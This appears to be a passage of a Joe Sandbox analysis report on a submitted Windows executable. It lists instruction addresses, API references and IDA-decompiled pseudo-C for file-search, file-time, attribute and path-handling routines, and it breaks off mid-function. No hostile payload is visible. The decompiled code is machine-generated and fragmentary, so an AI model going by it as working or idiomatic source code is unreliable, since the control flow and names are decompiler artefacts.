0x00e7a342
0x00e7a351
0x00e7a357
0x00e7a35f
0x00e7a365
0x00e7a373
0x00e7a379
0x00e7a38a
0x00e7a390
0x00e7a392
0x00e7a3aa
0x00e7a3b0
0x00e7a3b3
0x00e7a3be
0x00e7a3c2
0x00e7a3c9
0x00e7a3d0
0x00e7a3d4
0x00e7a3e8
0x00e7a3f3
0x00e7a403
0x00e7a3f5
0x00e7a3f9
0x00e7a3f9
0x00e7a409
0x00e7a415
0x00e7a41b
0x00e7a41b
0x00e7a41d
0x00e7a429
0x00e7a42f
0x00e7a431
0x00e7a43d
0x00e7a443
0x00e7a445
0x00e7a451
0x00e7a457
0x00e7a459
0x00e7a45f
0x00000000
0x00000000
0x00000000
0x00000000
0x00e7a45f
0x00e7a2c5
0x00e7a2d1
0x00e7a2d7
0x00000000
0x00e7a2d7
0x00000000
0x00e7a225
0x00e7a225
0x00e7a249
0x00e7a24e
0x00e7a46d
0x00000000
0x00e7a46f
0x00e7a21d
0x00e7a1c9
0x00e7a1cd
0x00e7a1d1
0x00000000

APIs

Part of subcall function 00E7A051: GetDC.USER32(00000000), ref: 00E7A055
Part of subcall function 00E7A051: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7A060
Part of subcall function 00E7A051: ReleaseDC.USER32(00000000,00000000), ref: 00E7A06B

GetObjectW.GDI32(?,00000018,?), ref: 00E7A1ED

Part of subcall function 00E7A476: GetDC.USER32(00000000), ref: 00E7A47F
Part of subcall function 00E7A476: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00E7A1DA,?,?,?), ref: 00E7A4AE
Part of subcall function 00E7A476: ReleaseDC.USER32(00000000,?), ref: 00E7A546

Strings

(, xrefs: 00E7A325

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: b489b3752ee94b31d9c7b9176d5ded7e9ad5c7c886261d2805c50b9ce8027318
Instruction ID: 3ed0b63bf3031a62cabc13dc761adf7ae617e0d8447b4055619fd3536f1e6d97
Opcode Fuzzy Hash: b489b3752ee94b31d9c7b9176d5ded7e9ad5c7c886261d2805c50b9ce8027318
Instruction Fuzzy Hash: DF910371208354AFC614DF25D848D2FBBE8FFC9704F14982EF59AE3260DA71A905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E8AC28 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E8AC28(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00E87C27(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00E8EB71(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00E88B69();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00E888C9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00E8EB71(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00E8AFF7(_a12, _t193, __eflags, _t213);
													E00E887FE(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00E8EB71(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00E88B69();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0xe9e668; // 0x8ae5c3d8
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00E8EBC0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00E7F5F0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00E85D80(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00E8AC10);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E00E7EEFA(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00E887FE(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00E8EB80( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00E8AFD2( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00E88C7A();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00E88B59();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x00e8ac2d
0x00e8ac30
0x00e8ac36
0x00e8ac4e
0x00e8ac51
0x00e8ac55
0x00e8ac57
0x00e8ac59
0x00e8ac5b
0x00e8ac5e
0x00e8ac61
0x00e8ac64
0x00e8ac66
0x00e8acbe
0x00e8acbe
0x00e8acc4
0x00e8acc6
0x00e8acd1
0x00e8acd5
0x00e8acd7
0x00e8acda
0x00e8acde
0x00e8acde
0x00e8ace0
0x00e8ace2
0x00e8ace4
0x00e8ace6
0x00e8ace6
0x00e8ace8
0x00e8aceb
0x00e8acee
0x00e8acee
0x00e8acf0
0x00e8acf1
0x00e8acf1
0x00e8acfc
0x00e8acfe
0x00e8ad01
0x00e8ad02
0x00e8ad05
0x00e8ad05
0x00e8ad09
0x00e8ad0c
0x00e8ad0f
0x00e8ad0f
0x00e8ad1d
0x00e8ad1f
0x00e8ad22
0x00e8ad24
0x00e8ad2e
0x00e8ad31
0x00e8ad34
0x00e8ad36
0x00e8ad39
0x00e8ad3b
0x00e8ad8b
0x00e8ad8e
0x00e8ad8e
0x00e8ad90
0x00000000
0x00e8ad3d
0x00e8ad3f
0x00e8ad3f
0x00e8ad41
0x00e8ad44
0x00e8ad44
0x00e8ad49
0x00e8ad4c
0x00e8ad4c
0x00e8ad4e
0x00e8ad4f
0x00e8ad4f
0x00e8ad53
0x00e8ad56
0x00e8ad56
0x00e8ad59
0x00e8ad5c
0x00e8ad69
0x00e8ad6e
0x00e8ad71
0x00e8ad73
0x00e8adad
0x00e8adae
0x00e8adaf
0x00e8adb0
0x00e8adb1
0x00e8adb2
0x00e8adb7
0x00e8adbb
0x00e8adbd
0x00e8adbe
0x00e8adc1
0x00e8adc1
0x00e8adc4
0x00e8adc4
0x00e8adc6
0x00e8adc7
0x00e8adc7
0x00e8add0
0x00e8add1
0x00e8add4
0x00e8add7
0x00e8adda
0x00e8addc
0x00e8ade3
0x00e8ade5
0x00e8ade8
0x00e8adf2
0x00e8adf5
0x00e8adf6
0x00e8adf8
0x00e8ae0c
0x00e8ae0c
0x00e8ae0f
0x00e8ae19
0x00e8ae1e
0x00e8ae21
0x00e8ae23
0x00000000
0x00e8ae25
0x00e8ae29
0x00e8ae32
0x00e8ae38
0x00000000
0x00e8ae3b
0x00e8adfa
0x00e8adfa
0x00e8ae00
0x00e8ae05
0x00e8ae08
0x00e8ae0a
0x00e8ae41
0x00e8ae43
0x00e8ae44
0x00e8ae45
0x00e8ae46
0x00e8ae47
0x00e8ae48
0x00e8ae4d
0x00e8ae50
0x00e8ae51
0x00e8ae53
0x00e8ae59
0x00e8ae60
0x00e8ae63
0x00e8ae66
0x00e8ae67
0x00e8ae6a
0x00e8ae6b
0x00e8ae6e
0x00e8ae6f
0x00e8ae90
0x00e8ae90
0x00e8ae92
0x00000000
0x00000000
0x00e8ae77
0x00e8ae79
0x00e8ae7b
0x00e8ae7d
0x00e8ae7f
0x00e8ae81
0x00e8ae83
0x00e8ae8e
0x00000000
0x00e8ae8e
0x00e8ae83
0x00e8ae7f
0x00000000
0x00e8ae7b
0x00e8ae94
0x00e8ae96
0x00e8ae99
0x00e8aeb2
0x00e8aeb2
0x00e8aeb4
0x00e8aeb7
0x00e8aec7
0x00e8aec9
0x00e8aec9
0x00e8aeb9
0x00e8aeb9
0x00e8aebc
0x00000000
0x00e8aebe
0x00e8aebe
0x00e8aec1
0x00000000
0x00e8aec3
0x00e8aec3
0x00e8aec3
0x00e8aec1
0x00e8aebc
0x00e8aed7
0x00e8aedb
0x00e8aee9
0x00e8aeee
0x00e8af03
0x00e8af05
0x00e8af0b
0x00e8af0e
0x00e8af40
0x00e8af40
0x00e8af45
0x00e8af4b
0x00e8af4b
0x00e8af52
0x00e8af6c
0x00e8af6c
0x00e8af6d
0x00e8af73
0x00e8af79
0x00e8af7a
0x00e8af7b
0x00e8af80
0x00e8af83
0x00e8af85
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8af54
0x00e8af54
0x00e8af5a
0x00e8af5c
0x00000000
0x00e8af5e
0x00e8af5e
0x00e8af61
0x00000000
0x00e8af63
0x00e8af63
0x00e8af6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8af6a
0x00e8af61
0x00e8af5c
0x00000000
0x00e8af87
0x00e8af8f
0x00e8af95
0x00e8af97
0x00e8af97
0x00e8af9f
0x00e8afa4
0x00e8afac
0x00e8afaf
0x00e8afb1
0x00e8afc5
0x00e8afca
0x00e8af10
0x00e8af10
0x00e8af11
0x00e8af12
0x00e8af13
0x00e8af14
0x00e8af1c
0x00e8af1c
0x00e8af1c
0x00e8af1e
0x00e8af21
0x00e8af24
0x00e8af24
0x00e8ae9b
0x00e8ae9e
0x00e8aea0
0x00000000
0x00e8aea2
0x00e8aea2
0x00e8aea5
0x00e8aea6
0x00e8aea7
0x00e8aea8
0x00e8aead
0x00e8aea0
0x00e8af2c
0x00e8af31
0x00e8af3c
0x00000000
0x00000000
0x00000000
0x00e8ae0a
0x00e8adde
0x00e8ade0
0x00e8ae3c
0x00e8ae40
0x00e8ae40
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8ad75
0x00e8ad78
0x00e8ad7b
0x00e8ad7e
0x00e8ad81
0x00e8ad84
0x00e8ad87
0x00e8ad87
0x00000000
0x00e8ad44
0x00e8ad26
0x00e8ad26
0x00e8ad92
0x00e8ad94
0x00000000
0x00e8ad99
0x00e8ac68
0x00e8ac68
0x00e8ac6b
0x00e8ac74
0x00e8ac77
0x00e8ac7e
0x00e8ac80
0x00e8ac99
0x00e8ac9a
0x00e8ac9b
0x00e8ac9d
0x00e8aca2
0x00e8ac82
0x00e8ac82
0x00e8ac85
0x00e8ac86
0x00e8ac88
0x00e8ac8a
0x00e8ac8c
0x00e8ac91
0x00e8ac91
0x00e8aca5
0x00e8aca7
0x00e8aca9
0x00000000
0x00000000
0x00e8acaf
0x00e8acb2
0x00e8acb4
0x00e8acb6
0x00000000
0x00e8acb8
0x00e8acb8
0x00e8acbb
0x00000000
0x00e8acbb
0x00000000
0x00e8acb6
0x00e8ad9a
0x00e8ad9d
0x00e8ada2
0x00000000
0x00e8ada5
0x00e8ac38
0x00e8ac38
0x00e8ac3f
0x00e8ac40
0x00e8ac42
0x00e8ac47
0x00e8ada6
0x00e8adaa
0x00e8adaa
0x00000000

APIs

_free.LIBCMT ref: 00E8AD94

Part of subcall function 00E88B69: IsProcessorFeaturePresent.KERNEL32(00000017,00E88B58,0000002C,00E9BC40,00E8BD76,00000000,00000000,00E89338,?,?,00E88B65,00000000,00000000,00000000,00000000,00000000), ref: 00E88B6B
Part of subcall function 00E88B69: GetCurrentProcess.KERNEL32(C0000417,00E9BC40,0000002C,00E88896,00000016,00E89338), ref: 00E88B8D
Part of subcall function 00E88B69: TerminateProcess.KERNEL32(00000000), ref: 00E88B94

Strings

*?, xrefs: 00E8AC6B
., xrefs: 00E8AF4B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: b6f4886fb241bc6412e8874b3df55810ed09b0cad714297808d292c8a57c0ef0
Instruction ID: 226258cbadf4f987d6b7550307a4d13041ca02567fe90d1334d7f4f9b70a80b1
Opcode Fuzzy Hash: b6f4886fb241bc6412e8874b3df55810ed09b0cad714297808d292c8a57c0ef0
Instruction Fuzzy Hash: EC516F75E00109AFEB15EFA8C881AADB7F5EF48314F28916AE84CF7340E6359E018B51

Uniqueness

Uniqueness Score: -1.00%

Function 00E677FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E677FA(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E00E7E554(E00E920CA, _t108);
				E00E7E630();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00E70131(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00E679FD(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4084, 0x800);
					_t113 =  *((short*)(_t108 - 0x4084)) - 0x3a;
					if( *((short*)(_t108 - 0x4084)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00E70109(__eflags, _t108 - 0x1014, _t108 - 0x4084, _t101);
							E00E67119(_t108 - 0x3084);
							_push(0);
							_t54 = E00E6A6B9(_t108 - 0x3084, _t99, __eflags, _t106, _t108 - 0x3084);
							_t85 =  *(_t108 - 0x207c);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E00E6A637(_t106, _t85 & 0xfffffffe);
							}
							E00E697B6(_t108 - 0x203c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00E6A06F(_t108 - 0x203c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x203c);
								_push(0);
								_t68 = E00E63AC2(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00E69870(_t108 - 0x203c);
								}
							}
							E00E697B6(_t108 - 0x50ac);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E00E69B50(_t108 - 0x50ac, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a8), _t108 - 0x205c, _t108 - 0x2054, _t108 - 0x204c);
								}
							}
							E00E6A637(_t106,  *(_t108 - 0x207c));
							E00E697F0(_t108 - 0x50ac, _t106);
							_t90 = _t108 - 0x203c;
						} else {
							E00E697B6(_t108 - 0x60d4);
							_push(1);
							_push(_t108 - 0x60d4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00E63AC2(_t81, _t99);
							_t90 = _t108 - 0x60d4;
						}
						_t61 = E00E697F0(_t90, _t106);
					} else {
						E00E66D72(_t113, 0x53, _t81 + 0x24, _t106);
						_t61 = E00E66FBA(0xea0f50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00E70131(_t108 - 0x1014, 0xe93760, 0x802);
					E00E70109(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x00e677fa
0x00e677ff
0x00e67809
0x00e67810
0x00e67819
0x00e67848
0x00e67848
0x00e67856
0x00e6785b
0x00e6785b
0x00e6786b
0x00e67870
0x00e67878
0x00e67897
0x00e6789b
0x00e678d8
0x00e678e3
0x00e678f0
0x00e678f3
0x00e678f8
0x00e678fe
0x00e67901
0x00e67904
0x00e67906
0x00e6790b
0x00e6790b
0x00e67916
0x00e67923
0x00e67931
0x00e67936
0x00e67938
0x00e6793a
0x00e67943
0x00e67944
0x00e67945
0x00e6794a
0x00e6794c
0x00e67954
0x00e67954
0x00e6794c
0x00e6795f
0x00e67964
0x00e67968
0x00e6796c
0x00e67977
0x00e6797c
0x00e6797e
0x00e6799b
0x00e6799b
0x00e6797e
0x00e679a8
0x00e679b3
0x00e679b8
0x00e6789d
0x00e678a3
0x00e678a8
0x00e678b2
0x00e678b3
0x00e678b6
0x00e678b9
0x00e678be
0x00e678be
0x00e679be
0x00e6787a
0x00e67881
0x00e6788d
0x00e6788d
0x00e679c9
0x00e679d3
0x00e679d3
0x00e6781b
0x00e6781f
0x00000000
0x00e67821
0x00e67821
0x00e67833
0x00e67841
0x00000000
0x00e67841

APIs

__EH_prolog.LIBCMT ref: 00E677FF
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E6799B

Part of subcall function 00E6A637: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E6A46D,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A64B
Part of subcall function 00E6A637: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E6A46D,?,?,?,00E6A2B3,?,00000001,00000000,?,?), ref: 00E6A67C

Strings

:, xrefs: 00E67870

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 868db1cc0ba57e5f15b54a051727af6ca4772cf56db8aa25b99cb618cc6ef0bc
Instruction ID: 5baecb229029b58038a9cf1181244b7725e257084c0f6dfe169c255c67f4aa2d
Opcode Fuzzy Hash: 868db1cc0ba57e5f15b54a051727af6ca4772cf56db8aa25b99cb618cc6ef0bc
Instruction Fuzzy Hash: 1E419471941228AAEB24EB50EC55EEEB3BCDF45344F0050DAB649B3182DB705F85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E6B85C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E6B85C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00E7E630();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00E6B9F6(_t71);
					_t66 = E00E83883(_t71);
					_t30 = E00E6BA22(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00E6BAFD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00E6B3F7(__eflags,  &_v4100, 0x800);
							_t39 = E00E83883( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00E70131(_a8, L"\\\\?\\", _t69);
							E00E70109(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00E6BAFD(_t71[1] & 0x0000ffff);
